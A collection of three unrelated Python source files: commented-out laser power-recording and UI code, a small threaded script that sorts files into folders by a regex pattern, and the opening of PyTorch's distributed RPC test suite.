# config = self.get_configuration(name=config_name)
# if config:
# self.info('loading lens configuration {}'.format(config_name))
# self.lens_configuration_names.append(config_name)
#
# offset = tuple(map(int, self.config_get(config, 'General', 'offset', default='0,0').split(',')))
#
# bd = self.config_get(config, 'General', 'beam', cast='float')
# user_enabled = self.config_get(config, 'General', 'user_enabled', cast='boolean', default=True)
# self.lens_configuration_dict[config_name] = (bd, offset, user_enabled)
#
# self.set_lens_configuration('gaussian')
#
# def set_lens_configuration(self, name=None):
# if name is None:
# name = self.lens_configuration
#
# try:
# bd, offset, enabled = self.lens_configuration_dict[name]
# except KeyError:
# return
#
# self.stage_manager.canvas.crosshairs_offset = offset
#
# self.set_beam_diameter(bd, force=True)
# self.beam_enabled = enabled
# def _write_h5(self, table, v, x):
# dm = self.data_manager
# table = dm.get_table(table, 'Power')
# if table is not None:
# row = table.row
# row['time'] = x
# row['value'] = v
# row.append()
# table.flush()
# def _record_brightness(self):
# cp = self.get_laser_brightness(verbose=False)
# if cp is None:
# cp = 0
#
# xi = self.power_graph.record(cp, series=1)
# self._write_h5('brightness', cp, xi)
#
# def _record_power(self):
# p = self.get_laser_watts()
#
# if p is not None:
# self._prev_power = p
# else:
# p = self._prev_power
#
# if p is not None:
# try:
# x = self.power_graph.record(p)
# self._write_h5('internal', p, x)
# except Exception, e:
# self.info(e)
# print 'record power ', e
# def start_power_recording(self, rid):
# self._recording_power_state = True
# m = 'power and brightness' if self.record_brightness else 'power'
# self.info('start {} recording for {}'.format(m, rid))
# self._current_rid = rid
#
# # zoom in for recording
# self._previous_zoom = self.zoom
# self.set_zoom(self.recording_zoom, block=True)
#
# self.open_power_graph(rid)
#
# self.data_manager = dm = H5DataManager()
# self._data_manager_lock = Lock()
#
# dw = DataWarehouse(root=os.path.join(self.db_root, 'power'))
# dw.build_warehouse()
#
# dm.new_frame(directory=dw.get_current_dir(),
# base_frame_name=rid)
# pg = dm.new_group('Power')
# dm.new_table(pg, 'internal')
#
# if self.power_timer is not None and self.power_timer.isAlive():
# self.power_timer.Stop()
#
# self.power_timer = Timer(1000, self._record_power)
#
# if self._get_record_brightness():
# dm.new_table(pg, 'brightness')
# if self.brightness_timer is not None and self.brightness_timer.isAlive():
# self.brightness_timer.Stop()
#
# # before starting the timer collect quick baseline
# # default is 5 counts @ 25 ms per count
# if self._get_record_brightness():
# self.collect_baseline_brightness()
# self.brightness_timer = Timer(175, self._record_brightness)
#
# def stop_power_recording(self, delay=5, save=True):
#
# def _stop():
# self._recording_power_state = False
# if self.power_timer is not None:
# self.power_timer.Stop()
# if self.brightness_timer is not None:
# self.brightness_timer.Stop()
#
# self.info('Power recording stopped')
# self.power_timer = None
# self.brightness_timer = None
# if save:
# db = self.get_power_database()
# if db.connect():
# dbp = db.add_power_record(rid=str(self._current_rid))
# self._current_rid = None
# db.add_path(dbp, self.data_manager.get_current_path())
# db.commit()
#
# else:
# self.data_manager.delete_frame()
#
# self.data_manager.close_file()
#
# self.set_zoom(self._previous_zoom)
# '''
# analyze the power graph
# if requested power greater than 1.5
# average power should be greater than 2
# '''
# if self._requested_power > 1.5:
# ps = self.power_graph.get_data(axis=1)
# a = sum(ps) / len(ps)
# if a < 2:
# self.warning('Does not appear laser fired. Average power reading ={}'.format(a))
#
# # delay = 0
# if self.power_timer is not None:
#
# if delay == 0:
# _stop()
# else:
# self.info('Stopping power recording in {} seconds'.format(delay))
# t = DoLaterTimer(delay, _stop)
# t.start()
# def show_video_controls(self):
# '''
# '''
# self.video_manager.edit_traits(view = 'controls_view')
# def launch_laser_pulse(self):
# '''
# '''
# p = os.path.join(paths.scripts_dir, 'laserscripts', 'laser_pulse.txt')
# pulse = LaserPulseScript(manager = self)
# pulse._load_script(p)
# pulse.edit_traits()
# def show_power_scan(self):
# '''
# '''
#
# pp = os.path.join(paths.scripts_dir, 'laserscripts', 'power_scans')
# pscan = PowerScanScript(manager = self, source_dir = pp)
# pscan.start()
# pscan.open()
# def traits_view(self):
# '''
# '''
# title = self.__class__.__name__ if self.title == '' else self.title
# vg = VSplit()
#
# hooks = [h for h in dir(self) if '__group__' in h]
# for h in hooks:
# vg.content.append(getattr(self, h)())
#
# return View(#HSplit(
# #Item('stream_manager', show_label = False, style = 'custom'),
# vg,
# # ),
# resizable = True,
# # menubar = self._menubar_factory(),
# title = title,
# handler = self.handler_klass)
# def _stage_manager_factory(self, args):
# if self.use_video:
# klass = VideoStageManager
# else:
# klass = StageManager
#
# sm = klass(**args)
# return sm
#
# def show_stage_manager(self, **kw):
# #self.stage_manager.controllable = True
# self.stage_manager.edit_traits(**kw)
#
# def close_stage_manager(self):
# self.stage_manager.close_ui()
# def _show_streams_(self, available_streams):
# sm = self.stream_manager
# dm = sm.data_manager
#
# available_streams.append(self.laser_controller)
#
# streams = sm.open_stream_loader(available_streams)
#
# if streams:
#
# self.streaming = True
# self.dirty = True
# if streams != 'running':
# for s in streams:
# p = s['parent']
# name = p.name
#
# dm.add_group(name)
# table = 'stream'
# dm.add_table(table, parent = 'root.%s' % name)
# sm.set_stream_tableid(name, 'root.%s.%s' % (name, table))
# self.stream_manager.edit_traits()
# def show_laser_control(self):
# self.edit_traits()
#
# def show_stage_manager(self):
# '''
# '''
# self.stage_manager.edit_traits()
# def show_motor_configurer(self):
# self.laser_controller.configure_motors()
# def show_video(self):
# self.video_manager = VideoManager()
# self.video_manager.edit_traits()
# def stop_streams(self):
# '''
# '''
# self.streaming = False
# self.stream_manager.stop_streams()
# def show_preferences(self):
# preferences.edit_traits()
# def get_menus(self):
# '''
# '''
# return [('File', [dict(name = 'Preferences', action = 'show_preferences',),
# #dict(name = 'Open Graph', action = 'open_graph'),
# #dict(name = 'Video Controls', action = 'show_video_controls')
# ]),
#
# ('Devices', [
# #dict(name = 'Laser Controller', action = 'show_laser_controller'),
# #dict(name = 'Laser Stats', action = 'show_laser_stats'),
# dict(name = 'Stage Manager', action = 'show_stage_manager'),
# dict(name = 'Configure Motion Controller', action = 'show_motion_controller_manager',
# #enabled_when='not stage_simulation'
# ),
# dict(name = 'Configure Motors', action = 'show_motor_configurer'),
# # dict(name = 'Video', action = 'show_video')
# ]),
# # ('Streams', [dict(name = 'Streams...', action = 'show_streams'),
# # dict(name = 'Stop', action = 'stop_streams', enabled_when = 'streaming'),
# # #dict(name = 'Save Graph ...', action = '_save_graph', enabled_when = 'dirty')
# # ]),
#
#
# self.get_calibration_menu()
#
# ]
# # def get_calibration_menu(self):
# # '''
# # '''
# # return ('Calibration', [
# # dict(name = 'Power Map', action = 'launch_power_map'),
# # dict(name = 'Beam Scan', action = 'launch_beam_scan')
# ## dict(name = 'Power Scan', action = 'launch_power_scan'),
# ## dict(name = 'Laser Pulse', action = 'launch_laser_pulse')
# # ]
# # )
# def control_group(self):
# cg = VGroup(
# HGroup(
# # Item('simulation_led', show_label = False, style = 'custom', editor = LEDEditor()),
# Item('enabled_led', show_label = False, style = 'custom', editor = LEDEditor()),
# self._button_factory('enable', 'enable_label', None),
# ),
#
# self._slider_group_factory([('request_power', 'request_power',
# {'enabled_when':'object.parent._enabled',
# 'defined_when':'object.parent.use_power_slider'
# }
# #{'defined_when':'"Diode" not in object.parent.__class__.__name__'}
# )]),
# self._update_slider_group_factory([('zoom', 'zoom', {})]),
# self._update_slider_group_factory([('beam', 'beam', {})]),
#
# defined_when = 'object.controllable'
# )
# return cg
|
sort.py
|
from queue import Queue
from threading import Thread
import os
import shutil
import re
# --------------------------------------------------------------------
# Get filelist
# select the common of filenames
# mkdir folders to common
# move them
# if need clear empty folder,change the bool
# --------------------------------------------------------------------
threading_num: int = 4
def SortFile(q: Queue):
while not q.empty():
a_dict: dict = q.get()
for Folder in a_dict.keys():
if not os.path.exists(Folder):
os.mkdir(Folder)
print("{folder} is created.".format(folder=Folder))
for File in a_dict[Folder]:
shutil.move(
File, "{folder}/{filename}".format(folder=Folder, filename=File))
print("{folder} is finished.".format(folder=Folder))
def main():
dirs: list[str] = os.listdir()
dirs.remove("sort.py")
files: list[str] = []
for i in dirs:
if os.path.isfile(i):
files.append(i)
common_dict: dict[str, list[str]] = {}
Accepted: bool = False
Accepte_receviced: str = ""
while not Accepted:
pattern: str = input("Keyin pattern : ")
if not pattern:
return None
common_dict.clear()
for i in files:
pattern_search_tuple = re.compile(pattern).search(i)
common_str: str = ""
if pattern_search_tuple:
if pattern_search_tuple.groups() != ():
common_str = "".join(pattern_search_tuple.groups())
else:
common_str = pattern_search_tuple[0]
else:
continue
if common_str in common_dict:
common_dict[common_str].append(i)
else:
common_dict[common_str] = [i]
for i in common_dict.keys():
print(i, " : ", common_dict[i], "\n")
print("\n\nTotal : ", len(common_dict.keys()))
Accepte_receviced = input(
"It is a result of match. Does it right?\n(nothing key in is Right;`inone` is put them in one folder;anything is error)")
if Accepte_receviced in ["", "inone"]:
Accepted = True
File_Queue: Queue = Queue()
if Accepte_receviced == "":
for i in common_dict.keys():
File_Queue.put({i: common_dict[i]})
elif Accepte_receviced == "inone":
Inone_Folder_name: str = input("inone folder's name: ")
for i in common_dict.keys():
File_Queue.put({Inone_Folder_name: common_dict[i]})
threading_list: list[Thread] = []
for _ in range(threading_num):
threading_list.append(Thread(target=SortFile, args=(File_Queue,)))
for i in threading_list:
i.start()
for i in threading_list:
i.join()
print("\n\n\n\n\n")
if __name__ == "__main__":
try:
while True:
main()
except IOError:
with open("sortpy.IOError.log", "w") as log:
log.write(IOError)
print("\n\nIt has a error.\a")
except OSError:
with open("sortpy.OSError.log", "w") as log:
log.write(OSError)
print("\n\nIt has a error.\a")
finally:
print("\n\nThe end.")
input()
|
rpc_test.py
|
import concurrent.futures
import contextlib
import json
import os
import sys
import threading
import time
from collections import namedtuple
from functools import partial
from threading import Event
from threading import Lock
from unittest import mock
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.distributed.rpc as rpc
import torch.distributed.autograd as dist_autograd
from torch.distributed.rpc import RRef, _get_debug_info, _rref_context_get_debug_info
from torch.distributed.rpc.api import _delete_all_user_and_unforked_owner_rrefs, _use_rpc_pickler, _thread_local_var, _wait_all
from torch.distributed.rpc.internal import (
PythonUDF,
RPCExecMode,
_internal_rpc_pickler,
_build_rpc_profiling_key,
)
from torch.futures import Future
from torch.testing._internal.common_distributed import (
skip_if_lt_x_gpu,
captured_output,
)
from torch.testing._internal.common_utils import IS_MACOS, load_tests, sandcastle_skip_if
from torch.testing._internal.dist_utils import (
dist_init,
get_function_event,
initialize_pg,
wait_until_node_failure,
wait_until_pending_futures_and_users_flushed,
wait_until_owners_and_forks_on_rank,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_utils import TemporaryFileName
from torch.autograd.profiler_legacy import profile as _profile
def foo_add():
return torch.add(torch.ones(1), torch.ones(1))
def udf_with_torch_ops(device=-1, use_record_function=False):
device_ctx = contextlib.suppress() if device == -1 else torch.cuda.device(device)
record_function_ctx = (
torch.autograd.profiler.record_function("##forward##")
if use_record_function
else contextlib.suppress()
)
with device_ctx, record_function_ctx:
t1, t2 = torch.ones(1), torch.ones(1)
t = torch.add(t1, t2)
t = torch.mul(t, t)
t = t.relu()
t = t.sigmoid()
# Events (operator invocations) that are expected to be ran as part of the above
# function.
EXPECTED_REMOTE_EVENTS = [
"aten::ones",
"aten::ones",
"aten::add",
"aten::mul",
"aten::relu",
"aten::clamp_min",
"aten::sigmoid",
]
# Remote operations are prefixed with the following string for RPC profiling.
REMOTE_OP_STR = "#remote_op: "
VALUE_FUTURE = concurrent.futures.Future()
DONE_FUTURE = concurrent.futures.Future()
FIFTY_MIL_CYCLES = 50000000
_rpc_barrier_count = 0
def _increment_count():
global _rpc_barrier_count
_rpc_barrier_count += 1
def _reset_count():
global _rpc_barrier_count
_rpc_barrier_count = 0
class StubRpcAgent:
def __init__(self, world_size):
self.world_size = world_size
def get_worker_infos(self):
return {
rpc.WorkerInfo(name=worker_name(rank), id=rank)
for rank in range(self.world_size)
}
def _stub_construct_rpc_backend_options_handler(**kwargs):
return mock.Mock() # RpcBackendOptions.
def _stub_init_rpc_backend_handler(store, name, rank, world_size, rpc_backend_options):
return StubRpcAgent(world_size=world_size)
def set_value(value):
VALUE_FUTURE.set_result(value)
def wait_for_value_future():
return VALUE_FUTURE.result()
def set_and_check_done(value):
VALUE_FUTURE.set_result(value)
return DONE_FUTURE.result()
# it is used to test python user defined function over rpc
# classes and functions are used to test python user defined class and
# methods over rpc
TensorClass = namedtuple("TensorClass", ["tensors"])
class MyPickleClass:
def __init__(self):
self.t = None
def __getstate__(self):
(pickled_python_udf, tensors) = _internal_rpc_pickler.serialize(
PythonUDF(my_tensor_function, (torch.ones(2, 2), torch.ones(2, 2)), None)
)
return (pickled_python_udf, tensors)
def __setstate__(self, obj):
python_udf = _internal_rpc_pickler.deserialize(obj[0], obj[1])
result = python_udf.func(python_udf.args[0], python_udf.args[1])
self.t = result
def set(self, val):
self.t = val
class SlowPickleClass:
def __init__(self, t):
self.t = t
def __getstate__(self):
time.sleep(self.t)
return (self.t, )
def __setstate__(self, obj):
self.t = obj[0]
time.sleep(self.t)
class MyClass:
def __init__(self, a, delay=False):
self.a = a
# delay initialization to simulate errors if specified
if delay:
time.sleep(2)
def my_instance_method(self, b):
return self.a + b
@classmethod
def my_class_method(cls, d, e):
return d + e
@staticmethod
def my_static_method(f):
return f > 10
def increment_value(self, increment):
self.a += increment
def get_value(self):
return self.a
def my_slow_method(self, my_tensor_arg):
time.sleep(5)
return torch.add(self.a, my_tensor_arg)
def _call_method_on_rref(method, rref, *args, **kwargs):
return method(rref.local_value(), *args, **kwargs)
def get_rref_list(values):
return [RRef(MyClass(a)) for a in values]
def add_rref_to_value(rref, value):
return rref.to_here() + value
def run_nested_pickle(pickle_cls_instance, tensor):
return pickle_cls_instance.t + tensor
def build_sparse_tensor(coalesce=False):
i = [[0, 1, 1], [2, 0, 2]]
v = [3, 4, 5]
tensor = torch.sparse_coo_tensor(i, v, (2, 3))
if coalesce:
tensor = tensor.coalesce()
return tensor
def build_complex_tensors():
a = torch.ones(3, 3)
b = [a, a]
c = [b, b]
d = [a, b]
e = {a: d}
return [a, b, c, d, e]
def non_cont_test(t_view, t_cont):
if t_view.is_contiguous():
raise Exception('t_view is contiguous!')
if not t_cont.is_contiguous():
raise Exception('t_cont is not contiguous!')
if not torch.equal(t_view, t_cont):
raise Exception('t_view is not equal to t_cont!')
return t_view
def my_function(a, b, c):
return a + b + c
def my_tensor_function(a, b):
return a + b
def my_container_sum(a):
result = a[0]
for tensor in a[1:]:
result += tensor
return result
def my_sleep_func(seconds=1):
time.sleep(seconds)
return torch.mul(torch.tensor(1), torch.tensor(1))
def my_complex_tensor_function(list_input, tensor_class_input, dict_input):
res = list_input[0]
for t in list_input:
res += t
for k, v in dict_input.items():
res += v
complex_tensors = tensor_class_input.tensors
return (res, complex_tensors[0], complex_tensors[1], complex_tensors[2])
def my_rref_function(rref_a, rref_b):
return rref_a.to_here() + rref_b.to_here()
def delayed_add(a, b, seconds=0.05):
time.sleep(seconds)
return a + b
def no_result():
print("do nothing")
def raise_or_inc(value):
if value.numel() == 2:
raise ValueError("Expected error")
return value + 1
def nested_rpc(dst):
return rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
def nested_rpc_sparse(dst):
return rpc.rpc_sync(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
)
def multi_layer_nested_async_rpc(dst, world_size, ttl):
# this method returns immediately without blocking the callee, but will
# generate additional requests.
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
rpc.rpc_async(
current_dst,
multi_layer_nested_async_rpc,
args=(next_dst, world_size, ttl - 1),
)
return 0
def nested_rref(dst):
return (
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1)),
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 2)),
)
def nested_rref_sparse(dst):
return (
rpc.remote(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
),
rpc.remote(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
),
)
def nested_remote(dst):
rref = rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 3))
return rref.to_here()
def nested_remote_sparse(dst):
rref = rpc.remote(dst, torch.add, args=(build_sparse_tensor(), build_sparse_tensor()))
return rref.to_here()
def rref_forward_chain(dst, world_size, rref, ttl):
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
ret_rref = rpc.remote(
current_dst, rref_forward_chain, args=(next_dst, world_size, rref, ttl - 1)
)
return [ret_rref]
else:
return rref.to_here()
def rpc_return_rref(dst):
return rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1))
def light_rpc():
return 0
def heavy_rpc(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
def heavy_rpc_sparse(tensor):
for i in range(1, 100):
tensor *= i
tensor = tensor / (i + 1)
return 0
@torch.jit.script
def heavy_rpc_torchscript(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def my_script_func(tensor):
return torch.add(tensor, tensor)
expected_err = "Expected error"
def raise_func():
raise ValueError(expected_err)
@torch.jit.script
def raise_func_script(expected_err: str) -> torch.Tensor:
raise ValueError(expected_err)
expected_err_escape = "\nFirst line of error \n next line of error \n last line of error"
def raise_func_escape():
raise ValueError(expected_err_escape)
global_rref = None
def set_global_rref(rref):
global global_rref
global_rref = rref
def clear_global_rref():
global global_rref
global_rref = None
def check_rref_confirmed(rref):
return rref.confirmed_by_owner()
def get_rref_debug_info():
return _rref_context_get_debug_info()
def add_use_future_cb(to, x, y, z):
out = concurrent.futures.Future()
def callback(fut):
out.set_result(fut.wait() + z)
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(callback)
return out.result()
def get_events_from_profile(profile_rref):
return profile_rref.local_value().process_global_function_events
def add_use_future_set_result(to, x, y, z):
out = torch.futures.Future()
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(lambda fut : out.set_result(fut.wait() + z))
return out.wait()
def add_use_future_nested_cb(to, x, y, z):
out = torch.futures.Future()
def callback(fut1):
fut2 = rpc.rpc_async(to, torch.add, args=(fut1.wait(), z))
fut2.then(lambda fut2 : out.set_result(fut2.wait()))
fut1 = rpc.rpc_async(to, torch.add, args=(x, y))
fut1.then(callback)
return out.wait()
def fail_on_fut(fut):
pass
@rpc.functions.async_execution
def async_raise_func():
raise RuntimeError("Expected error")
@rpc.functions.async_execution
def async_wrong_type():
return torch.zeros(2, 2)
@rpc.functions.async_execution
def async_add(to, x, y):
return rpc.rpc_async(to, torch.add, args=(x, y))
def slow_add(x, y, device="cpu"):
time.sleep(1)
x = x.to(device)
y = y.to(device)
return torch.add(x, y).cpu()
@rpc.functions.async_execution
def slow_async_add(to, x, y, device="cpu"):
return rpc.rpc_async(to, slow_add, args=(x, y, device))
@rpc.functions.async_execution
def async_add_with_future_ctor(to, x, y, z):
fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut1: fut.set_result(fut1.wait() + z)
)
return fut
@rpc.functions.async_execution
def async_add_chained(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_chained_multi(to, x, num, step):
fut = rpc.rpc_async(to, torch.add, args=(x, 0))
for _ in range(num):
fut = fut.then(lambda fut: fut.wait() + step)
return fut
@rpc.functions.async_execution
def async_add_nested(to, x, y, z):
return rpc.rpc_async(to, async_add, args=(to, x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_multi_fanout(to, x, num, step):
futs = []
for i in range(num):
if i == 0:
futs.append(rpc.rpc_async(to, torch.add, args=(x, step)))
else:
futs.append(rpc.rpc_async(to, torch.add, args=(0, step)))
# TODO: use torch.futures.collect_all
lock = Lock()
state = {"cnt": 0, "ret": torch.zeros_like(x)}
ret_future = torch.futures.Future()
def inc_and_set(fut):
with lock:
state["cnt"] += 1
state["ret"] += fut.wait()
if state["cnt"] >= len(futs):
ret_future.set_result(state["ret"])
for fut in futs:
fut.then(inc_and_set)
return ret_future
@rpc.functions.async_execution
def async_cuda_sleep_and_set_to_one(t):
device = t.device
original_stream = torch.cuda.current_stream(device)
new_stream = torch.cuda.Stream(device)
new_stream.wait_stream(original_stream)
with torch.cuda.stream(new_stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
t.fill_(1)
fut = Future(devices=[device])
fut.set_result(t)
return fut
@rpc.functions.async_execution
def async_cuda_nested_add(to, x, y, z):
def cb(fut):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
return fut.value() + z
return rpc.rpc_async(to, torch.add, args=(x, y)).then(cb)
# A custom Python class that contains a tensor, needed to see if we correctly
# use the Python pickler to extract tensors from non-IValue-convertible types.
class TensorWrapper:
__slots__ = ("tensor", "lock", "event")
def __init__(self, t):
self.tensor = t
# Add one non-picklable field, to ensure it's ignored/skipped.
self.lock = Lock()
self.event = torch.cuda.Event(enable_timing=True)
def increase(self, v):
with self.lock:
self.tensor += v
def sum(self):
with self.lock:
self.event.record()
return self.tensor.sum()
# Copied from test/test_cuda.py.
_cycles_per_ms = None
def get_cycles_per_ms():
"""Approximate number of cycles per millisecond for torch.cuda._sleep"""
global _cycles_per_ms
if _cycles_per_ms is None:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
_cycles_per_ms = 1000000 / start.elapsed_time(end)
return _cycles_per_ms
class AsyncExecutionClass:
@staticmethod
@rpc.functions.async_execution
def static_async_add(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@classmethod
@rpc.functions.async_execution
def class_async_add(cls, to, x, y, z):
ret_fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: ret_fut.set_result(fut.wait() + z)
)
return ret_fut
@rpc.functions.async_execution
def bound_async_add(self, to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
def return_future():
return torch.futures.Future()
class FooBackendOptions(rpc.RpcBackendOptions):
def __init__(self, init_method):
# Must call the __init__ of the superclass (and do so directly,
# without using super()) because... pybind.
rpc.RpcBackendOptions.__init__(self)
self.init_method = init_method
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
class MyEmbeddingBagModel(torch.nn.Module):
def __init__(self, sparse):
super().__init__()
self.eb = torch.nn.EmbeddingBag(
10,
10,
sparse=sparse
)
def forward(self, x):
return self.eb(x)
class MyParameterServer:
def __init__(self, trainers):
self.lock = Lock()
self.trainers = trainers
self.iteration = 0
self.updates = 0
self.futures = []
self.total = None
self.gradient = None
@staticmethod
def get_gradient(rref):
return rref.local_value().gradient
@staticmethod
@rpc.functions.async_execution
def average(rref, riteration, tensor):
self = rref.local_value()
fut = torch.futures.Future()
with self.lock:
if riteration > self.iteration:
self.iteration = riteration
self.updates = 0
self.futures.clear()
self.futures.append(fut)
if self.total is None:
self.total = tensor
else:
self.total += tensor
self.updates += 1
if self.trainers == self.updates:
self.gradient = self.total / float(self.trainers)
for fut in self.futures:
result = self.total / float(self.trainers)
fut.set_result(result)
return fut
class RpcTest(RpcAgentTestFixture):
@dist_init
def test_worker_id(self):
n = self.rank + 1
peer_rank = n % self.world_size
self_worker_info = rpc.get_worker_info()
peer_worker_info = rpc.get_worker_info(worker_name(peer_rank))
self.assertEqual(self_worker_info.name, worker_name(self.rank))
self.assertEqual(peer_worker_info.name, worker_name(peer_rank))
with self.assertRaisesRegex(RuntimeError, "Unknown destination worker"):
unknown_worker_id = rpc.get_worker_info("WorkerUnknown")
@dist_init
def test_get_worker_infos(self):
worker_infos = rpc.api._get_current_rpc_agent().get_worker_infos()
worker_names = {worker_info.name for worker_info in worker_infos}
expected_worker_names = {
worker_name(rank) for rank in range(self.world_size)
}
self.assertEqual(worker_names, expected_worker_names)
worker_ids = {worker_info.id for worker_info in worker_infos}
expected_worker_ids = set(range(self.world_size))
self.assertEqual(worker_ids, expected_worker_ids)
@dist_init
def test_self_add(self):
self_worker_info = rpc.get_worker_info()
self_worker_name = worker_name(self.rank)
fut = rpc.rpc_async(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
ret = rpc.rpc_sync(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertEqual(ret, torch.ones(2, 2) + 1)
@dist_init
def test_send_to_rank(self):
dst_rank = (self.rank + 1) % self.world_size
# Test dense tensor
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test sparse tensor
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
x = build_sparse_tensor()
y = build_sparse_tensor()
expected_tensor = (x + y)
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(x, y))
self.assertEqual(expected_tensor, ret)
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
x = build_sparse_tensor(coalesce=True)
y = build_sparse_tensor(coalesce=True)
expected_tensor = (x + y)
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(x, y))
self.assertEqual(expected_tensor, ret)
# Test invalid ranks
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(self.world_size + 1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(-1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank + 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank - 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
def _self_py_udf_remote(self, worker_info, x, y, z):
rref = rpc.remote(worker_info, my_function, args=(x, y, z))
self.assertEqual(rref.to_here(), x + y + z)
@dist_init
def test_self_py_udf_remote(self):
self._self_py_udf_remote(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_py_udf_remote_sparse(self):
self._self_py_udf_remote(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
def _self_remote_rref_as_rpc_arg(self, dst, x, y, z):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(x, y, z))
fut = rpc.rpc_async(dst, add_rref_to_value, args=(rref, x))
ret = rpc.rpc_sync(dst, add_rref_to_value, args=(rref, x + y))
self.assertEqual(ret, x + y + z + x + y)
self.assertEqual(fut.wait(), x + y + z + x)
@dist_init
def test_self_remote_rref_as_rpc_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_rpc_arg(
dst,
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_rpc_arg_sparse(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_rpc_arg(
dst,
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_self_rpc_arg(self):
self._self_remote_rref_as_rpc_arg(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_self_rpc_arg_sparse(self):
self._self_remote_rref_as_rpc_arg(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
def _self_remote_rref_as_remote_arg(self, dst, x, y, z):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(x, y, z))
ret_rref = rpc.remote(dst, add_rref_to_value, args=(rref, x))
self.assertEqual(
ret_rref.to_here(), x + y + z + x
)
@dist_init
def test_self_remote_rref_as_remote_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_remote_arg(
dst,
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_remote_arg_sparse(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_remote_arg(
dst,
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_self_remote_arg(self):
self._self_remote_rref_as_remote_arg(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_self_remote_arg_sparse(self):
self._self_remote_rref_as_remote_arg(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_rref_proxy_non_exist(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
msg = "has no attribute \'non_exist\'"
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_sync().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_async().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.remote().non_exist()
